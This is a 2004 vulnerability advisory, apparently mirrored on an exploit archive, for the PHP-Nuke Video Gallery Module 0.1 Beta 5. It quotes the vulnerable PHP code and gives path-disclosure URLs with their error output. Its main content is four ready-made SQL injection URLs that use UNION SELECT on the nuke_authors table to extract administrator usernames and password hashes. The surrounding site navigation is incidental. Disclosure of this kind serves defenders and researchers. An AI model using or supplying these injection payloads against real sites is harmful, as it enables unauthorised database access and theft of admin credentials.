phpnukeVideo.txt

phpnukeVideo.txt: Posted Apr 28, 2004; Authored by DarkBicho | Site darkbicho.tk; PHP-Nuke Video Gallery Module version 0.1 Beta 5 is susceptible to full path disclosure and SQL injection attacks.; tags | exploit, php, sql injection; SHA-256 | fe3ff118560c7e9a4f76a80601322a0fa94b9f122ffbe84c9212355bc5ab8523; Download | Favorite | View

phpnukeVideo.txt

Adivore: https://bichosoft.webcindario.com/advisory-03.txt

===========================================================================
=================== Multiple vulnerabilities PHP-Nuke =====================
=================== Video Gallery Module for PHP-Nuke =====================

PROGRAM: PHP-Nuke Video Gallery Module for PHP-Nuke
HOMEPAGE: https://videogallery.engorile.com/
VERSION: 0.1 Beta 5
BUG: Multiple vulnerabilities
DATE:  26/04/2004
AUTHOR: DarkBicho
   web: https://www.darkbicho.tk
   team: Security Wari Proyects <www.swp-zone.org>
   Email: darkbicho@peru.com

===========================================================================
===========================================================================


Vulnerabilities:
---------------

1.- CODE:
    ¨¨¨¨
================================ CODE ===================================
function render_detail_clip($clipid, $catid){
  global $prefix, $dbi, $module_name;
  $tipomime="application/unknown";
  $next=next_clips($clipid, $catid);
  $result=sql_query("select descripcion, url_thumb, url_preview, accesos from 
".$prefix."_videos_clips where clipid=$clipid", $dbi);
  list($descripcion, $url_thumb, $url_preview, 
$accesos)=sql_fetch_row($result, $dbi);
  $resultado=AbreTabla();
  if ($next["previous"]){
    $resultado.="<a 
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["previous"]."&catid=$catid>"._PREVIOUS."</a>";
  }
  $resultado.="</td><td align=right>";
  if ($next["next"]){
    $resultado.="<a 
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["next"]."&catid=$catid>"._NEXT."</a>";
  }
  $resultado.=CierraTabla().AbreTabla().$descripcion."</td></tr><tr><td>";
  if ($url_preview != ""){
    $tipomime=tipomime($clipid, "clips");
    $result2=sql_query("select class_id, options_object, options_embed from 
".$prefix."_videos_tipos where tipomime='$tipomime'", $dbi);
    list($class_id, $options_object, $options_embed)=sql_fetch_row($result2, 
$dbi);
    $resultado.="<center>".mete_video($url_preview, $tipomime, 160, 
120)."</center>";

  }
  else{
    $resultado.="<center><img src=\"$url_thumb\"></center>";
  }
  $resultado.=CierraTabla().AbreTabla().votacion_clip($clipid, $catid);
  if (count_total($clipid, "clip", "ficheros") > 0){
    $resultado.=CierraTabla().AbreTabla().clip_files($clipid, 
$catid).CierraTabla();
  }
  else{
    $resultado.=CierraTabla();
  }
  $accesos++;
  sql_query("update ".$prefix."_videos_clips set accesos=$accesos where 
clipid=$clipid", $dbi);
  return "$resultado";
}

=========================================================================

2.- Full path disclosure:
    ¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨

    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive 
information.

    A) 
https://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho

       Warning: mysql_fetch_row(): supplied argument is not a valid MySQL 
result resource in                                    
/home/hosting/php-nuke/includes/sql_layer.php on line 286

    B) 
https://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1

       Warning: mysql_fetch_row(): supplied argument is not a valid MySQL 
result resource in                                   
/home/hosting/php-nuke/includes/sql_layer.php on line 286



3.- Sql injection:
    ¨¨¨¨¨¨¨¨¨¨¨¨¨¨
    This sql injection exploit can pull out from database any information, 
for example
    superadmin's username and password's md5 hash:


    A) 
https://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1

    B)
https://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

    c)
https://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1

    D)
https://[target]/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1


SOLUTION:
¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks ago and plan to release a fixed 
version soon.
    Check the Video Gallery website for updates and official release 
details.

_________________________________________________________________
Charla con tus amigos en línea mediante MSN Messenger: 
https://messenger.latam.msn.com/

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 57 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,965)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,994)
UNIX (9,476)
UnixWare (188)
Windows (6,784)
Other

phpnukeVideo.txt

phpnukeVideo.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpnukeVideo.txt

Share This

phpnukeVideo.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems